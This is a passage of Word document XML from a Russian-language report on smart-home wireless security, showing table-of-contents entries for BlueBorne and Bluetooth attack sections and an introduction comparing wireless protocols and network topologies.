              <w:instrText xml:space="preserve"> PAGEREF _Toc503991009 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00731F50">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="0095726D" w:rsidRDefault="0095726D">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="a6"/>
              <w:noProof/>
              <w:u w:val="none"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t xml:space="preserve">      </w:t>
          </w:r>
          <w:hyperlink w:anchor="_Toc503991010" w:history="1">
            <w:r w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">4.1.1.1 </w:t>
            </w:r>
            <w:r w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Атака BlueBorne на Android</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc503991010 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00731F50">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="0095726D" w:rsidRDefault="0095726D">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="a6"/>
              <w:noProof/>
              <w:u w:val="none"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t xml:space="preserve">      </w:t>
          </w:r>
          <w:hyperlink w:anchor="_Toc503991011" w:history="1">
            <w:r w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">4.1.1.2 </w:t>
            </w:r>
            <w:r w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Атака BlueBorne на Linux</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc503991011 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00731F50">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>36</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="0095726D" w:rsidRDefault="0095726D">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="a6"/>
              <w:noProof/>
              <w:u w:val="none"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t xml:space="preserve">      </w:t>
          </w:r>
          <w:hyperlink w:anchor="_Toc503991012" w:history="1">
            <w:r w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">4.1.1.3 </w:t>
            </w:r>
            <w:r w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Атака</w:t>
            </w:r>
            <w:r w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> BlueBorne </w:t>
            </w:r>
            <w:r w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>на</w:t>
            </w:r>
            <w:r w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Windows</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc503991012 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00731F50">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>37</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="0095726D" w:rsidRDefault="0095726D">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="a6"/>
              <w:noProof/>
              <w:u w:val="none"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t xml:space="preserve">      </w:t>
          </w:r>
          <w:hyperlink w:anchor="_Toc503991013" w:history="1">
            <w:r w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.1.1.4</w:t>
            </w:r>
            <w:r w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve"> Атака BlueBorne на iOS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc503991013 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00731F50">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="0095726D" w:rsidRDefault="000004AB">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc503991014" w:history="1">
            <w:r w:rsidR="0095726D" w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>5 ПРАКТИЧЕСКАЯ ЧАСТЬ</w:t>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc503991014 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00731F50">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>39</w:t>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="0095726D" w:rsidRDefault="000004AB">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc503991015" w:history="1">
            <w:r w:rsidR="0095726D" w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve">5.1 Реализация уязвимостей старых </w:t>
            </w:r>
            <w:r w:rsidR="0095726D" w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Bluetooth</w:t>
            </w:r>
            <w:r w:rsidR="0095726D" w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> устройств .Утилита </w:t>
            </w:r>
            <w:r w:rsidR="0095726D" w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Bluediving</w:t>
            </w:r>
            <w:r w:rsidR="0095726D" w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc503991015 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00731F50">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>39</w:t>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="0095726D" w:rsidRDefault="000004AB">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc503991016" w:history="1">
            <w:r w:rsidR="0095726D" w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2</w:t>
            </w:r>
            <w:r w:rsidR="0095726D" w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0095726D" w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">Уязвимости современных </w:t>
            </w:r>
            <w:r w:rsidR="0095726D" w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Bluetooth</w:t>
            </w:r>
            <w:r w:rsidR="0095726D" w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> устройств</w:t>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc503991016 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00731F50">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>40</w:t>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="0095726D" w:rsidRDefault="000004AB">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc503991017" w:history="1">
            <w:r w:rsidR="0095726D" w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ЗАКЛЮЧЕНИЕ</w:t>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc503991017 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00731F50">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>51</w:t>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="0095726D" w:rsidRDefault="000004AB">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc503991018" w:history="1">
            <w:r w:rsidR="0095726D" w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>СПИСОК ИСПОЛЬЗУЕМЫХ ИСТОЧНИКОВ</w:t>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc503991018 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00731F50">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>52</w:t>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00A30BD5" w:rsidRPr="000C799E" w:rsidRDefault="00A30BD5" w:rsidP="00C07525">
          <w:r w:rsidRPr="000C799E">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="00EC41E1" w:rsidRPr="00CE711D" w:rsidRDefault="00EC41E1" w:rsidP="00C07525">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A30BD5" w:rsidRPr="000C799E" w:rsidRDefault="00A30BD5" w:rsidP="00C07525"/>
    <w:p w:rsidR="00A30BD5" w:rsidRPr="000C799E" w:rsidRDefault="00A30BD5" w:rsidP="00C07525"/>
    <w:p w:rsidR="00A30BD5" w:rsidRPr="000C799E" w:rsidRDefault="00A30BD5" w:rsidP="00C07525"/>
    <w:p w:rsidR="00A30BD5" w:rsidRPr="000C799E" w:rsidRDefault="00A30BD5" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E4F7A" w:rsidRPr="000C799E" w:rsidRDefault="00A30BD5" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc503990995"/>
      <w:r w:rsidRPr="000C799E">
        <w:lastRenderedPageBreak/>
        <w:t>ВВЕДЕНИЕ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="008B19F4" w:rsidRPr="000C799E" w:rsidRDefault="003E4F7A" w:rsidP="00F57840">
      <w:pPr>
        <w:pStyle w:val="af0"/>
      </w:pPr>
      <w:r w:rsidRPr="000C799E">
        <w:t>Общий обзор б</w:t>
      </w:r>
      <w:r w:rsidR="008B19F4" w:rsidRPr="000C799E">
        <w:t>еспроводны</w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t>х</w:t>
      </w:r>
      <w:r w:rsidR="008B19F4" w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> технологи</w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t>й</w:t>
      </w:r>
      <w:r w:rsidR="008B19F4" w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> умного дома</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B19F4" w:rsidRPr="000C799E" w:rsidRDefault="008B19F4" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t>Теперь, когда количество установленных в доме умных устройств, как ожидается, к концу десятилетия резко увеличится, важно понимать, как все эти устройства взаимодействуют друг с другом, а также с хозяином, доверяющим им управление своим домом. Для автоматизации частного жилья особую важность имеют беспроводные протоколы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B19F4" w:rsidRPr="000C799E" w:rsidRDefault="008B19F4" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t>Сейчас существует пять основных и уже зарекомендовавших себя протоколов связи, и еще один только что появился. Каждый из этих протоколов имеет свои особенности, и выбор правильного сочетания для вашего дома - это важная часть процесса разработки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F68AA" w:rsidRPr="000C799E" w:rsidRDefault="008B19F4" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t>В этой статье мы рассмотрим наиболее часто используемые беспроводные протоколы и обсудим, какие варианты использования являются предпочтительными для каждого из них.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B19F4" w:rsidRPr="00F57840" w:rsidRDefault="008B19F4" w:rsidP="00F57840">
      <w:pPr>
        <w:pStyle w:val="af0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F57840">
        <w:t>Беспроводные протоколы на частотах до 1 ГГц</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B19F4" w:rsidRPr="001A71B8" w:rsidRDefault="008B19F4" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t>Для решения задач обеспечения безопасности и автоматизации дома протоколы, работающие на частотах ниже 1 ГГц,</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">имеют существенные преимущества над более мощными и функциональными протоколами, работающими в диапазоне 2,4 ГГц (такими как </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Wi-Fi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">™ и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>), т.к. для этих задач требуется низкая скорость передачи данных.</w:t>
      </w:r>
      <w:r w:rsidR="001A71B8" w:rsidRPr="001A71B8">
        <w:t>[1]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B19F4" w:rsidRPr="000C799E" w:rsidRDefault="008B19F4" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t>Такие относительно низкочастотные сети обеспечивают высокую дальность связи. Узкополосная связь может работать на расстояниях до километра или более. Эти сети передают данные непосредственно получателю без посредников на пути. Однако в этом случае на связь сильное влияние оказывают радиопомехи от других устройств. Если данные частоты сильно загрязнены, то это может накладывать существенные ограничения на работу сети. Важным преимуществом низкочастотных сетей является более низкое энергопотребление по сравнению с протоколами, работающими на частоте 2.4 ГГц.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B19F4" w:rsidRPr="000C799E" w:rsidRDefault="008B19F4" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:lastRenderedPageBreak/>
        <w:t>Тем не менее низкочастотные сети не являются идеальным решением для всех задач умного дома. Многие из существующих низкочастотных сетей используют частные протоколы и являются закрытыми системами. Эти системы часто требуют специального приложения для обеспечения взаимодействия с другими системами. Такие протоколы для обеспечения связи внутри дома и с облаком могут быть достаточно сложными.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C14C68" w:rsidRPr="000C799E" w:rsidRDefault="00C14C68" w:rsidP="00C07525"/>
    <w:p w:rsidR="008B19F4" w:rsidRPr="0044023C" w:rsidRDefault="009369F2" w:rsidP="00C07525">
      <w:r w:rsidRPr="0044023C">
        <w:t>Так же</w:t>
      </w:r>
      <w:r w:rsidR="008B19F4" w:rsidRPr="0044023C">
        <w:t xml:space="preserve"> важно понимать разницу между устройствами, работающими на протоколе 802.11 b/g/n, и устройствами на базе ячеистых сетей. На ри</w:t>
      </w:r>
      <w:r w:rsidR="00152F8F">
        <w:t xml:space="preserve">сунке </w:t>
      </w:r>
      <w:r w:rsidR="008B19F4" w:rsidRPr="0044023C">
        <w:t>1 показана сеть типа "звезда" в сравнении с ячеистой сетью. Первое, что вы, вероятно, заметили, что в сети "звезда" (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008B19F4" w:rsidRPr="0044023C">
        <w:t>Wi-Fi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008B19F4" w:rsidRPr="0044023C">
        <w:t>) весь трафик направляется через центральную точку, а в ячеистой сети (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008B19F4" w:rsidRPr="0044023C">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008B19F4" w:rsidRPr="0044023C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008B19F4" w:rsidRPr="0044023C">
        <w:t>Thread</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008B19F4" w:rsidRPr="0044023C">
        <w:t>, Z-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008B19F4" w:rsidRPr="0044023C">
        <w:t>wave</w:t>
      </w:r>
